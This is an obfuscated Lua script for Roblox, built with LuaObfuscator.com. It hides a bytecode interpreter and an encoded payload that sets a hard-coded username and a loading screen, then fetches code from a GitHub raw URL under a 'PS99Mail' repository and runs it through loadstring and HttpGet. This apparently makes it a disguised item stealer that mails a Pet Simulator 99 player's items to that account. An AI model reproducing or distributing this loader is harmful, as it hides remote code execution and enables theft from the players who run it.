--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.0) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=v2(v0(v30,16));if v19 then local v77=0;local v78;while true do if (v77==0) then v78=v5(v70,v19);v19=nil;v77=1;end if (v77==1) then return v78;end end else return v70;end end end);local function v20(v31,v32,v33)if v33 then local v71=(v31/((5 -3)^(v32-(2 -(1 + 0)))))%((3 -1)^(((v33-1) -(v32-(2 -1))) + (620 -((1432 -(282 + 595)) + 64)))) ;return v71-(v71%(932 -((2494 -(1523 + 114)) + 74))) ;else local v72=0;local v73;while true do if ((0 + 0)==v72) then v73=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v73 + v73))>=v73) and (1 + (0 -0))) or (1065 -(68 + 997)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v36 * 256) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (120 -(32 + 85)) );v18=v18 + (9 -5) + (0 -0) ;return (v40 * (3720433 + 13056783)) + (v39 * 65536) + (v38 * (1213 -(892 + (118 -53)))) + v37 ;end local function v24()local v41=350 -(87 + 263) ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(181 -(67 + 113))) then v44=1 + 0 ;v45=(v20(v43,(444 -(416 + 26)) -(3 -2) ,20) * ((2 + 0)^(127 -95))) + v42 ;v41=2;end if ((952 -(802 + 150))==v41) then v42=v23();v43=v23();v41=2 -1 ;end if (v41==2) then v46=v20(v43,37 -16 ,23 + 8 );v47=((v20(v43,32)==((429 + 569) -(915 + 82))) and  -(1 -0)) or ((440 -(145 + 293)) -1) ;v41=2 + 1 ;end if (v41==(3 -0)) then if (v46==((1617 -(44 + 386)) -(1069 + 118))) then if (v45==(0 -(1486 -(998 + 488)))) then return v47 * (0 + 0) ;else v46=1 -0 ;v44=0 + 0 + 0 ;end elseif (v46==(3636 -1589)) then return ((v45==((772 -(201 + 571)) + 0)) and (v47 * (1/(791 -(368 + 423))))) or (v47 * NaN) ;end return v8(v47,v46-(3214 -2191) ) * (v44 + (v45/((20 -(10 + (1146 -(116 + 1022))))^(199 -147)))) ;end end end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(3 -2) );v18=v18 + v48 ;local v50={};for v67=4 -3 , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 -0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (1==v51) then v54=nil;v55=nil;v51=1276 -(388 + 886) ;end if (v51~=4) then else while true do if (v52==(2 -0)) then v57=nil;v58=nil;v52=3;end if (v52==1) then v55=nil;v56=nil;v52=2;end if ((0 + 0)==v52) then local v95=560 -(306 + 254) ;while true do if ((336 -(144 + 192))==v95) then v53=0;v54=nil;v95=1 + 0 ;end if ((1 -0)==v95) then v52=1468 -(899 + 568) ;break;end end end if (v52==(2 + 1)) then v59=nil;while true do local v96=0;local v97;while true do if (v96==(0 + 0)) then v97=0 -0 ;while true do if ((604 -(268 + 335))~=v97) then else if (v53==(290 -(60 + 230))) then local v104=0 -0 ;while true do if (v104==(0 + 0)) then v54={};v55={};v104=573 -(426 + 146) ;end if (v104~=(1976 -(1913 + 62))) then else v56={};v53=1;break;end end end if (v53~=(2 + 0)) then else local v105=0 + 0 ;while true do if (v105==(1456 -(282 + 1174))) then for v148=1,v58 do local v149=0;local v150;local v151;local v152;local v153;local v154;while true do if (v149~=(812 -(569 + 242))) then else v152=nil;v153=nil;v149=7 -5 ;end if (v149~=(5 -3)) then else v154=nil;while true do if (v150==(1 + 0)) then v153=nil;v154=nil;v150=1026 -(706 + 318) ;end if (v150~=(1251 -(721 + 530))) then else v151=1271 -(945 + 326) ;v152=nil;v150=1;end if (v150==(4 -2)) then while true do if (v151==(0 + 0)) then local v179=856 -(564 + 292) ;while true do if (v179==1) then v151=1;break;end if (v179==(0 + 0)) then local v181=0 -0 ;while true do if (v181==(700 -(271 + 429))) then v152=0 + 0 ;v153=nil;v181=1501 -(1408 + 92) ;end if ((1087 -(461 + 625))==v181) then v179=1289 -(993 + 295) ;break;end end end end end if (v151~=1) then else v154=nil;while true do if (v152==(1 + 0)) then if (v153==(1172 -(418 + 753))) then v154=v21()~=0 ;elseif (v153==(478 -(41 + 435))) then v154=v24();elseif (v153~=(2 + 1)) then else v154=v25();end v59[v148]=v154;break;end if (v152==(0 + 0)) then local v183=0;while true do if (v183==(0 + 0)) then local v191=0;while true do if ((1 + 0)==v191) then v183=1 + 0 ;break;end if (v191~=(1613 -(1565 + 48))) then else v153=v21();v154=nil;v191=530 -(406 + 123) ;end end end if (v183~=(1770 -(1749 + 20))) then else v152=268 -(176 + 91) ;break;end end end end break;end end break;end end break;end if (v149==(0 + 0)) then v150=1322 -(1249 + 73) ;v151=nil;v149=1 + 0 ;end end end v57[3]=v21();v105=1146 -(466 + 679) ;end if (v105==(1093 -(975 + 117))) then for v155=1876 -(157 + 1718) ,v23() do local v156=0 + 0 ;local v157;local v158;local v159;local v160;while true do if ((6 -4)~=v156) then else while true do if (v157==(0 -0)) then v158=0;v159=nil;v157=2 -1 ;end if (v157==(2 -1)) then v160=nil;while true do if (v158~=0) then else local v180=0 -0 ;while true do if (v180==(0 -0)) then v159=0 -0 ;v160=nil;v180=1 -0 ;end if (v180~=(1901 -(106 + 1794))) then else v158=1;break;end end end if ((1 + 0)==v158) then while true do if (v159==(0 + 0)) then v160=v21();if (v20(v160,2 -1 ,2 -1 )~=(114 -(4 + 110))) then else local v184=611 -(602 + 9) ;local v185;local v186;local v187;local v188;local v189;local v190;while true do if (v184==2) then v189=nil;v190=nil;v184=587 -(57 + 527) ;end if (v184==(1428 -(41 + 1386))) then v187=nil;v188=nil;v184=874 -(826 + 46) ;end if (v184~=3) then else while true do if (v185==(103 -(17 + 86))) then local v192=0 -0 ;while true do if (v192==(1 + 0)) then v185=1;break;end if (v192==(0 -0)) then v186=0 -0 ;v187=nil;v192=1;end end end if ((168 -(122 + 44))==v185) then v190=nil;while true do if (v186==(0 -0)) then local v194=0 -0 ;local v195;while true do if (v194==(440 -(382 + 58))) then v195=0 + 0 ;while true do if (1~=v195) then else v186=1;break;end if ((0 + 0)==v195) then v187=0 -0 ;v188=nil;v195=1;end end break;end end end if (v186~=(67 -(30 + 35))) then else while true do if (v187==(1 + 0)) then local v198=0 -0 ;local v199;while true do if (v198~=(1257 -(1043 + 214))) then else v199=0 -0 ;while true do if (v199~=(1212 -(323 + 889))) then else local v207=0 -0 ;while true do if ((0 -0)==v207) then v190={v22(),v22(),nil,nil};if (v188==(214 -(22 + 192))) then local v214=0;local v215;while true do if (v214==(683 -(483 + 200))) then v215=320 -(53 + 267) ;while true do if (v215==0) then v190[1466 -(1404 + 59) ]=v22();v190[1 + 3 ]=v22();break;end end break;end end elseif (v188==1) then v190[416 -(15 + 398) ]=v23();elseif (v188==(984 -(18 + 964))) then v190[11 -8 ]=v23() -((2 + 0)^(781 -(468 + 297))) ;elseif (v188==(2 + 1)) then local v220=0;local v221;local v222;while true do if (0==v220) then v221=0 -0 ;v222=nil;v220=2 -1 ;end if (v220~=(851 -(20 + 830))) then else while true do if (v221==(0 + 0)) then v222=126 -(116 + 10) ;while true do if (v222==(236 -(141 + 95))) then v190[3 + 0 ]=v23() -((1 + 1)^(41 -25)) ;v190[9 -5 ]=v22();break;end end break;end end break;end end end v207=739 -(542 + 196) ;end if (v207~=(1 + 0)) then else v199=1 -0 ;break;end end end if (v199~=1) then else v187=2;break;end end break;end end end if (v187~=(3 + 0)) then else if (v20(v189,2 + 1 ,4 -1 )==(1 + 0)) then v190[167 -(92 + 71) ]=v59[v190[2 + 2 ]];end v54[v155]=v190;break;end if (v187==0) then local v201=0;local v202;while true do if (v201==(0 -0)) then v202=0 + 0 ;while true do if (v202==(765 -(574 + 191))) then local v208=0 + 0 ;while true do if (v208==(0 + 0)) then local v213=0;while true do if (v213==0) then v188=v20(v160,2,3);v189=v20(v160,4,15 -9 );v213=1;end if (v213~=(2 -1)) then else v208=1552 -(1126 + 425) ;break;end end end if (v208==1) then v202=406 -(118 + 287) ;break;end end end if ((3 -2)==v202) then v187=1122 -(118 + 1003) ;break;end end break;end end end if (v187~=2) then else local v203=0 -0 ;while true do if (v203==(2 -1)) then v187=380 -(142 + 235) ;break;end if (v203==0) then local v206=0;while true do if (v206~=(4 -3)) then else v203=1 + 0 ;break;end if (v206~=0) then else if (v20(v189,978 -(553 + 424) ,1)~=(2 -1)) then else v190[2]=v59[v190[2]];end if (v20(v189,3 -1 ,2)==1) then v190[3 + 0 ]=v59[v190[3]];end v206=1 -0 ;end end end end end end break;end if (v186==1) then local v196=0 + 0 ;local v197;while true do if (v196~=(0 + 0)) then else v197=0 + 0 ;while true do if (v197~=(1 + 0)) then else v186=4 -2 ;break;end if (v197==0) then v189=nil;v190=nil;v197=2 -1 ;end end break;end end end end break;end if (v185==(1887 -(927 + 959))) then local v193=0 -0 ;while true do if (v193==1) then v185=734 -(16 + 716) ;break;end if (v193~=(0 -0)) then else v188=nil;v189=nil;v193=2 -1 ;end end end end break;end if (v184==(0 -0)) then v185=0 + 0 ;v186=nil;v184=4 -3 ;end end end break;end end break;end end break;end end break;end if (v156==(754 -(239 + 514))) then v159=nil;v160=nil;v156=1 + 1 ;end if (v156==0) then v157=0 -0 ;v158=nil;v156=1 + 0 ;end end end v53=1332 -(797 + 532) ;break;end end end break;end if (v97==0) then if (v53==1) then local v106=0 + 0 ;while true do if (v106~=(0 + 0)) then else v57={v54,v55,nil,v56};v58=v23();v106=1;end if (v106==(1 + 0)) then v59={};v53=1204 -(373 + 829) ;break;end end end if (v53==(536 -(43 + 490))) then local v107=0;while true do if (0==v107) then for v161=732 -(476 + 255) ,v23() do v55[v161-(1131 -(369 + 761)) ]=v28();end return v57;end end end v97=860 -(240 + 619) ;end end break;end end end break;end end break;end if (v51~=(0 + 0)) then else v52=0 -0 ;v53=nil;v51=1 -0 ;end if (v51==(1 + 2)) then v58=nil;v59=nil;v51=4;end if ((240 -(64 + 174))==v51) then v56=nil;v57=nil;v51=1747 -(1344 + 400) ;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v79=v64;local v80=v65;local v81=v66;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v94=0;while true do if (v94==1) then if (v92<=11) then if (v92<=5) then if (v92<=2) then if (v92<=0) then v89[v91[2]]();elseif (v92==1) then local v117=0;local v118;local v119;local v120;local v121;while true do if (v117==2) then for v175=v118,v84 do local v176=0;while true do if (v176==0) then v121=v121 + 1 ;v89[v175]=v119[v121];break;end end end break;end if (v117==0) then v118=v91[2];v119,v120=v82(v89[v118](v13(v89,v118 + 1 ,v91[3])));v117=1;end if (v117==1) then v84=(v120 + v118) -1 ;v121=0;v117=2;end end else v62[v91[3]]=v89[v91[2]];end elseif (v92<=3) then v89[v91[2]]=v91[3]~=0 ;elseif (v92==4) then for v163=v91[2],v91[3] do v89[v163]=nil;end else v89[v91[2]]=v91[3];end elseif (v92<=8) then if (v92<=6) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92>7) then v83=v91[3];else local v128=v91[2];v89[v128]=v89[v128](v13(v89,v128 + 1 ,v84));end elseif (v92<=9) then local v109=v91[2];local v110=v89[v91[3]];v89[v109 + 1 ]=v110;v89[v109]=v110[v91[4]];elseif (v92==10) then do return;end else local v130=v91[2];local v131,v132=v82(v89[v130](v13(v89,v130 + 1 ,v91[3])));v84=(v132 + v130) -1 ;local v133=0;for v165=v130,v84 do v133=v133 + 1 ;v89[v165]=v131[v133];end end elseif (v92<=17) then if (v92<=14) then if (v92<=12) then do return;end elseif (v92>13) then v62[v91[3]]=v89[v91[2]];else v89[v91[2]]=v91[3]~=0 ;end elseif (v92<=15) then v89[v91[2]]();elseif (v92==16) then local v137=v91[2];local v138=v89[v91[3]];v89[v137 + 1 ]=v138;v89[v137]=v138[v91[4]];elseif ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v62;else v89[v91[2]]=v62[v91[3]];end elseif (v92<=20) then if (v92<=18) then if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v62;else v89[v91[2]]=v62[v91[3]];end elseif (v92>19) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end else local v145=v91[2];v89[v145]=v89[v145](v13(v89,v145 + 1 ,v84));end elseif (v92<=21) then v89[v91[2]]=v91[3];elseif (v92>22) then v83=v91[3];else for v168=v91[2],v91[3] do v89[v168]=nil;end end v83=v83 + 1 ;break;end if (v94==0) then v91=v79[v83];v92=v91[1];v94=1;end end end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030D3O004C6F6164696E675363722O656E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726903083O00557365726E616D6503073O0055494A4857444103153O0073656C65637465644C6F6164696E675363722O656E03013O0032001C3O0012153O00014O0004000100013O0026143O0002000100010004083O00020001001215000100013O00261400010011000100020004083O001100012O0003000200013O001202000200033O001211000200043O001211000300053O002010000300030006001215000500074O0001000300054O000700023O00024O0002000100010004083O001B000100261400010005000100010004083O00050001001215000200093O001202000200083O0012150002000B3O0012020002000A3O001215000100023O0004083O000500010004083O001B00010004083O000200012O000A3O00017O00",v9(),...);
